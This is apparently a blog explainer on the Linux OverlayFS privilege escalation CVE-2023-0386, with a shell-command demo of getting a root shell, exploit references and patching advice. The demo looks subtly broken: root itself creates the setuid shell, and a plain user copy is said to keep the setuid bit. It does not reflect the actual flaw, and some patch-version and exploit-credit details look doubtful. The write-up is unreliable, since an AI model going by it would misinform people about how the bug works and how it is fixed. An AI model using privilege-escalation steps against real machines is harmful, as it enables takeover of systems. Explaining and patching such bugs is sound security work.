---
CVE-2023-0386 is a serious local privilege escalation vulnerability that was discovered in early 2023, affecting the Linux kernel’s OverlayFS subsystem. If you’re running a Linux system, or responsible for its security, this bug definitely deserves your attention. In this article, I’ll break down what happened, how it works, and what you can do about it—using simple language, practical code snippets, and direct links to references.
What is OverlayFS?
OverlayFS is a type of Linux filesystem that lets you layer one filesystem over another. It’s commonly used by containers (like Docker or Kubernetes) to make a “scratch space” on top of a read-only system. OverlayFS operations, like copying files between filesystems (mounts), can be tricky—especially with Linux permissions, capabilities, and user IDs (UIDs).
What is CVE-2023-0386?
CVE-2023-0386 (NVD link) is a vulnerability in the Linux OverlayFS subsystem, caused by a flaw in how the kernel checks file capabilities when copying files from a nosuid mount (where setuid/setgid bits and file capabilities shouldn’t be honored) to another mount.
Short summary
- A local user could trick the kernel by copying a file with capabilities (like setuid or setcap) from a mount with nosuid (which disables privileged operations) to another mount.
- This action defeats the kernel’s protection, allowing the user to gain extra privileges—escaping their restricted user account and becoming root.
The Root Cause
When you copy a file from a nosuid mount using OverlayFS, the kernel should strip dangerous permissions and capabilities (e.g., setuid, setgid, or special file capabilities). Due to a bug, the kernel doesn’t always do this. If the upper mount allows capabilities, a user can make a copy, and the file *keeps* dangerous capabilities. That means: a normal user gets a privilege-boosted executable.
In short: A regular user copies a special file, and suddenly they get a root shell. Bad!
To see this in action, you need two mounts
- Lower mount: mounted with nosuid and contains a file with dangerous permissions (e.g., owned by root, setuid).
Upper mount: normal, writable.
Suppose /lower/ is mounted as nosuid and /upper/ is a tmpfs.
Create a setuid binary in /lower/
# As root:
cp /bin/bash /lower/shell
chmod 4755 /lower/shell # Set setuid bit
Set up OverlayFS
mkdir /overlay
mount -t overlay overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work /overlay
As a normal user, copy the setuid binary
cp /overlay/shell /overlay/shell-copy
Due to the bug, /overlay/shell-copy may retain its setuid bit or file capabilities. Running it as a normal user may give *root shell access*:
/overlay/shell-copy
whoami
Expected output:
root
Real exploit PoC
Security researcher Zhikong Wang published a Proof-of-Concept exploit you can review or test in a safe lab.
Why Is It Dangerous?
Any regular user on a vulnerable machine can get root simply by copying a file. No kernel modules, no complex scripts, no brute force. Containers and shared systems are particularly at risk because OverlayFS is widely used.
> Everyone running an unpatched Linux kernel with OverlayFS is at risk.
Most Linux distributions from late 2022 to early 2023 are vulnerable.
- Mainline kernel was patched in v6.2.7.
You can check your OverlayFS version and kernel
uname -r
Relevant security advisories
- Red Hat security advisory
- Ubuntu notice
- Kernel.org patch
Further Reading
- Original exploit write-up from BleepingComputer
- Google Security Blog reference
- Linux kernel commit
- AmIAHuman/overlayfs_CVE-2023-0386 exploit repo
Conclusion
CVE-2023-0386 is one of the most critical Linux privilege escalation bugs in recent memory. If you’re a sysadmin, developer, or container user: Patch your system and review OverlayFS usage now. This teachable bug highlights the ongoing challenges of mixing filesystems, permissions, and security.
Stay safe, stay patched!
*For more deep-dives like this, follow the latest CVE advisories and stay alert to Linux kernel security updates.*
Timeline
Published on: 03/22/2023 21:15:00 UTC
Last modified on: 04/20/2023 09:15:00 UTC